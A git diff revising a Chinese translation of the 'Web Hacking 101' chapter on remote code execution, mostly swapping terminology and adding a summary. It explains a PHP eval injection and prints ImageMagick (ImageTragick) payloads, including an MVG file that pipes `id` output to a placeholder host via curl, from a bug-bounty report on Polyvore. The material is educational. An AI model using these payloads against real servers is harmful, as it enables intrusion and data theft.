--- a/Web_Hacking_101/0x11-代碼執行.md
+++ b/Web_Hacking_101/0x11-代碼執行.md
@@ -1,4 +1,4 @@
-## **0x11-代碼執行**
+## **0x11-程式碼執行**
 >作者：Peter Yaworski
 >
 >譯者：飛龍
@@ -6,17 +6,17 @@
 >協議：CC BY-NC-SA 4.0
 
 描述
-遠端代碼執行是指註入由漏洞應用解釋和執行的代碼。這通常由用戶提交輸入，應用使用它而沒有任何類型的處理或驗證而導致。
-看一下這行代碼：
+遠端程式碼執行是指註入由漏洞應用解釋和執行的程式碼。這通常由用戶提交輸入，應用使用它而沒有任何類型的處理或驗證而導致。
+看一下這行程式碼：
 
 ```php
 $var = $_GET['page'];
 eval($var);
 ```
-這裏，漏洞應用可能使用 URL `index.php?page=1`，但是，如果用於輸入了`index.php?page=1;phpinfo()`，應用就會執行`phpinfo`函數，並返回其內容。
+這裡，漏洞應用可能使用 URL `index.php?page=1`，但是，如果用於輸入了`index.php?page=1;phpinfo()`，應用就會執行`phpinfo`函數，並返回其內容。
 <p>
 
-與之類似，遠端代碼執行有時用於指代命令註入，OWASP 區分了這兩點。使用命令駐入，根據 OWASP，漏洞應用在主機操作系統上執行任何命令。同樣，這也由不合理處理和驗證用戶輸入導致，這會導致用戶輸入傳遞給操作系統的命令。
+與之類似，遠端程式碼執行有時用於指代命令註入，OWASP 區分了這兩點。使用命令駐入，根據 OWASP，漏洞應用在主機操作系統上執行任何命令。同樣，這也由不合理處理和驗證用戶輸入導致，這會導致用戶輸入傳遞給操作系統的命令。
 
 <p>
 
@@ -26,15 +26,15 @@ eval($var);
 ## **示例**
 
 ### **1. Polyvore ImageMagick**
-ImageMagick 是個軟件包，通常用於處理圖像，例如剪裁、縮放等等。 PHP 的 imagick、Ruby 的 rmagick 以及 paperclip，以及 NodeJs 的 imagemagick 都利用了它。在 2016 年 4 月，該庫中發現了多個漏洞，其中可利用的漏洞之一就是執行遠程代碼，這就是我關註的。
+ImageMagick 是個軟體包，通常用於處理圖像，例如剪裁、縮放等等。 PHP 的 imagick、Ruby 的 rmagick 以及 paperclip，以及 NodeJs 的 imagemagick 都利用了它。在 2016 年 4 月，該庫中發現了多個漏洞，其中可利用的漏洞之一就是執行遠端代碼，這就是我關註的。
 
-簡單來說，ImageMagick 並沒有合理地傳給他的過濾文件名稱，並且最終用於執行system方法調用。因此，攻擊者利益傳入命令來執行，就像`https://example.com”|ls"-la`，它會被執行。一個來自 ImageMagick 的例子是：
+簡單來說，ImageMagick 並沒有合理地傳給他的過濾文件名稱，並且最終用於執行system方法呼叫。因此，攻擊者利益傳入命令來執行，就像`https://example.com"|ls"-la`，它會被執行。一個來自 ImageMagick 的例子是：
 
 ```
 convert 'https://example.com"|ls "-la' out.png
 ```
 
-現在，有趣的是，ImageMagick 為 MVG（Magick Vectire Graphics）文件定義了自己的語法。所以，攻擊者能夠創建文件exploit.mvg，帶有下列代碼：
+現在，有趣的是，ImageMagick 為 MVG（Magick Vectire Graphics）文件定義了自己的語法。所以，攻擊者能夠創建文件`exploit.mvg`，帶有下列程式碼：
 
 ```
 push graphic-context
@@ -43,9 +43,9 @@ fill 'url(https://example.com/image.jpg"|ls "-la)'
 pop graphic-context
 ```
 
-這之後會傳給該庫，並且如果站點存在漏洞，代碼會執行並列出目錄中的文件。
+這之後會傳給該庫，並且如果站點存在漏洞，程式碼會執行並列出目錄中的文件。
 
-了解其背景之後，Ben Sadeghipour 測試了 Yahoo acquisition 站點以及 Polyvore 是否存在漏洞。就像他博文中所述，Ben 首先在它所控制的本地機器上測試了該漏洞，來確認mvg文件是否正常工作。這是他使用的代碼：
+了解其背景之後，Ben Sadeghipour 測試了 Yahoo acquisition 站點以及 Polyvore 是否存在漏洞。就像他博文中所述，Ben 首先在它所控制的本地機器上測試了該漏洞，來確認mvg文件是否正常工作。這是他使用的程式碼：
 
 ```
 push graphic-context
@@ -55,7 +55,7 @@ image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:80
 pop graphic-context
 ```
 
-這裏你可以看到，它使用了 CURL 庫來調用 SOMEIPADDRESS（將其修改為你服務器的地址）。如果成功，你就會得到像這樣的響應：
+這裡你可以看到，它使用了 CURL 庫來呼叫 SOMEIPADDRESS（將其修改為你服務器的地址）。如果成功，你就會得到像這樣的響應：
 
 ![1](https://raw.githubusercontent.com/dyeat/Document_read/master/Web_Hacking_101/image/15-1.jpg)
 
@@ -67,7 +67,10 @@ Ben Sadeghipour ImageMagick 測試的服務器響應
 Ben Sadeghipour Polyvore ImageMagick 響應
 >重要結論
 >
->閱讀是成功滲透的重要組成部分，這包括閱讀軟件漏洞和常見漏洞，以及披露（CVE 標識符）。
+>閱讀是成功滲透的重要組成部分，這包括閱讀軟體漏洞和常見漏洞，以及披露（CVE 標識符）。
 >當你碰到沒有安裝安全更新的站點時，了解之前的漏洞能夠幫助你。
->這裏， Yahoo 已經修補了服務器，但是沒有正確完成（我找不到關於這是什麽意思的解釋）。
->一次你，了解 ImageMagick 漏洞讓 Ben 特地以這個軟件為目標，並得到了 $2000 的獎金。
+>這裡， Yahoo 已經修補了服務器，但是沒有正確完成（我找不到關於這是什麽意思的解釋）。
+>一次你，了解 ImageMagick 漏洞讓 Ben 特地以這個軟體為目標，並得到了 $2000 的獎金。
+
+## **總結**
+遠端代碼執行，就像其他漏洞一樣，通常是用戶輸入沒有合理驗證和處理的結果。這裏提供的例子中，ImageMagick 沒有合理轉義可能為惡意的內容。它和 Ben 對該漏洞的知識一起，讓他能夠特地尋找和測試一些漏洞站點。對於搜索這些類型的漏洞來說，沒有簡單的答案。要註意發布的 CVE，並且留意站點所使用的軟件，它們可能會過時，也可能存在漏洞。
